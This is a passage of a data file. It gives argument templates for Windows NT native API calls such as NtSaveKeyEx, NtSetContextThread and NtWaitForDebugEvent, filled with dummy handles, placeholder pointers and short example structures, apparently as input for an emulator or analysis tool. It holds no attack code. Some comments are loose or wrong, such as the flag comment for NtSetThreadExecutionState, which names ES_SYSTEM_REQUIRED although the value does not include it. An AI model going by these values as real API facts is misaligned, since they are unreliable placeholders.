\"structures\": {}\r\n },\r\n \"NtRevertContainerImpersonation\": {\r\n \"ntFunc\": \"NtRevertContainerImpersonation\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtRollbackRegistryTransaction\": {\r\n \"ntFunc\": \"NtRollbackRegistryTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOL Wait (TRUE, wait for rollback to complete)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE RegistryHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSaveKeyEx\": {\r\n \"ntFunc\": \"NtSaveKeyEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000DEAD\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000BEEF\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSaveMergedKeys\": {\r\n \"ntFunc\": \"NtSaveMergedKeys\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000DEAD\",\r\n \"additionalComment\": \"HANDLE FileHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000BEEF\",\r\n \"additionalComment\": \"HANDLE LowPrecedenceKeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000FEED\",\r\n \"additionalComment\": \"HANDLE HighPrecedenceKeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSecureConnectPort\": {\r\n \"ntFunc\": \"NtSecureConnectPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ConnectDataLength (dummy pointer, commonly None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ConnectData (None, no connect data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG MaxMsgLength (dummy pointer, commonly None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PREMOTE_PORT_VIEW pSectionMapInfo (None, optional)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PSID SecurityInfo (None, optional)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PPORT_VIEW pSectionInfo (None, optional)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG QOS (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Name (dummy pointer, commonly non-None)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct110\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the port name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE PortHandle (dummy pointer, output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct110\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0040\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0060\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetBootOptions\": {\r\n \"ntFunc\": \"NtSetBootOptions\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG BufferLength (example: 32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PVOID Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetCachedSigningLevel\": {\r\n \"ntFunc\": \"NtSetCachedSigningLevel\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000DEAD\",\r\n \"additionalComment\": \"HANDLE TargetFile (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG SourceFileCount (example: 2 files)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to HANDLE SourceFiles (dummy pointer to array)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x0000BEEF\"\r\n },\r\n {\r\n \"value\": \"0x00000006\",\r\n \"additionalComment\": \"BYTE InputSigningLevel (example: 6, SIGNING_LEVEL_ANTIMALWARE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (example: 1, e.g., CACHE_SIGNING_LEVEL_FLAG_USE_FOR_PROCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetCachedSigningLevel2\": {\r\n \"ntFunc\": \"NtSetCachedSigningLevel2\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to LevelInformation (dummy pointer, typically a structure or buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Buffer or structure describing signing level information.\",\r\n \"pointedValue\": \"0xbadd1000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE TargetFile (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"SourceFileCount (example: 2 source files)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to array of source file handles (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Pointer to array of handles to source files.\",\r\n \"pointedValue\": \"0x00000555\"\r\n },\r\n {\r\n \"value\": \"0x03\",\r\n \"additionalComment\": \"InputSigningLevel (example: SIGNING_LEVEL_3)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Flags (example: 1, e.g., CACHE_SIGNING_LEVEL_FLAG_USE_FOR_PROCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetContextThread\": {\r\n \"ntFunc\": \"NtSetContextThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to CONTEXT structure (dummy pointer)\",\r\n \"structurePointer\": \"CONTEXT\",\r\n \"structureRef\": \"struct111\",\r\n \"structureValueExpectations\": \"Thread context structure (registers, flags, etc.)\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000666\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct111\": {\r\n \"type\": \"CONTEXT\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"ContextFlags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00010007\",\r\n \"fieldComment\": \"CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS\"\r\n },\r\n {\r\n \"fieldName\": \"Eip\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00401000\",\r\n \"fieldComment\": \"Instruction pointer\"\r\n },\r\n {\r\n \"fieldName\": \"Esp\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0012FFB0\",\r\n \"fieldComment\": \"Stack pointer\"\r\n },\r\n {\r\n \"fieldName\": \"Eax\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"General purpose register\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetDebugFilterState\": {\r\n \"ntFunc\": \"NtSetDebugFilterState\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x01\",\r\n \"additionalComment\": \"State (TRUE, enable filter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"Level (example: 2, moderate verbosity)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000000A\",\r\n \"additionalComment\": \"Component (example: 10, arbitrary component ID)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetDefaultUILanguage\": {\r\n \"ntFunc\": \"NtSetDefaultUILanguage\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000409\",\r\n \"additionalComment\": \"LanguageId (en-US, 0x409)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetIRTimer\": {\r\n \"ntFunc\": \"NtSetIRTimer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Time (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct112\",\r\n \"structureValueExpectations\": \"Absolute or relative time value.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000777\",\r\n \"additionalComment\": \"HANDLE TimerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct112\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x00000001DCD65000\",\r\n \"fieldComment\": \"Example: 2 seconds in 100-nanosecond intervals\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtSetInformationDebugObject\": {\r\n \"ntFunc\": \"NtSetInformationDebugObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional, often None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"Length of Buffer (8 bytes, typical for small info classes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer, typically to a structure or data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"DEBUGOBJECTINFOCLASS Class (DebugObjectFlagsInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE DebugHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationSymbolicLink\": {\r\n \"ntFunc\": \"NtSetInformationSymbolicLink\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"BufferLength (16 bytes, typical for a small structure or string)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer, e.g., to a structure or data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Class (SymbolicLinkGlobalInformation, typical value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Handle (dummy handle to symbolic link object)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetLdtEntries\": {\r\n \"ntFunc\": \"NtSetLdtEntries\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000FFFF\",\r\n \"additionalComment\": \"ULONG LdtEntry2H (typical high word for LDT entry)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000F000\",\r\n \"additionalComment\": \"ULONG LdtEntry2L (typical low word for LDT entry)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG Selector2 (selector index, e.g., 0x20)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000AAAA\",\r\n \"additionalComment\": \"ULONG LdtEntry1H (typical high word for LDT entry)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000A000\",\r\n \"additionalComment\": \"ULONG LdtEntry1L (typical low word for LDT entry)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000018\",\r\n \"additionalComment\": \"ULONG Selector1 (selector index, e.g., 0x18)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetSystemEnvironmentValueEx\": {\r\n \"ntFunc\": \"NtSetSystemEnvironmentValueEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Attributes (EFI_VARIABLE_NON_VOLATILE, typical for UEFI variables)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"BufferLength (8 bytes, typical for a small value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer, e.g., to value data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x12345678\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to GUID (dummy pointer, typically to a GUID structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xA1B2C3D4\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Name (dummy pointer, typically to variable name)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0060\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetSystemPowerState\": {\r\n \"ntFunc\": \"NtSetSystemPowerState\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"Flags (POWER_ACTION_OVERRIDE_APPS, typical flag)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"SYSTEM_POWER_STATE State (PowerSystemSleeping1, e.g., sleep)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000003\",\r\n \"additionalComment\": \"POWER_ACTION Action (PowerActionSleep, typical action)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetThreadExecutionState\": {\r\n \"ntFunc\": \"NtSetThreadExecutionState\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG PreviousState (dummy pointer, optional, often None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x80000000\",\r\n \"additionalComment\": \"ULONG State (ES_SYSTEM_REQUIRED | ES_CONTINUOUS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetUuidSeed\": {\r\n \"ntFunc\": \"NtSetUuidSeed\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to UCHAR UuidSeed (dummy pointer, typically 16 bytes for UUID seed)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00112233\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSubscribeWnfStateChange\": {\r\n \"ntFunc\": \"NtSubscribeWnfStateChange\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG (dummy pointer, optional, often None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG EventMask (example: 1 for basic event mask)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG ChangeStamp (example: 0x10 for a plausible change stamp)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x41C64E6D\",\r\n \"additionalComment\": \"PCWNF_STATE_NAME StateName (example: plausible state name value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSuspendProcess\": {\r\n \"ntFunc\": \"NtSuspendProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtTranslateFilePath\": {\r\n \"ntFunc\": \"NtTranslateFilePath\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG OutputFilePathLength (256 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to output file path buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG OutputType (example: 1 for FILE_PATH_TYPE_WIN32)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to input file path buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtUnloadKey2\": {\r\n \"ntFunc\": \"NtUnloadKey2\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES TargetKey (None, typical for default/unpopulated)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtUnloadKeyEx\": {\r\n \"ntFunc\": \"NtUnloadKeyEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Event (None, no event signaled on completion)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES TargetKey (None, typical for default/unpopulated)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtUnsubscribeWnfStateChange\": {\r\n \"ntFunc\": \"NtUnsubscribeWnfStateChange\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PCWNF_STATE_NAME StateName (None, no state name specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtVdmControl\": {\r\n \"ntFunc\": \"NtVdmControl\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ControlData (None, no control data provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG ControlCode (default: 0, e.g., VdmStartExecution)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWaitForAlertByThreadId\": {\r\n \"ntFunc\": \"NtWaitForAlertByThreadId\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER Time_Out (None, wait indefinitely)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Timeout interval as a relative or absolute time value.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE Handle (None, current thread)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWaitForDebugEvent\": {\r\n \"ntFunc\": \"NtWaitForDebugEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG Result (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Time_Out (dummy pointer, None for infinite wait)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct113\",\r\n \"structureValueExpectations\": \"Timeout interval in 100-nanosecond units, or None for infinite.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Alertable (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": 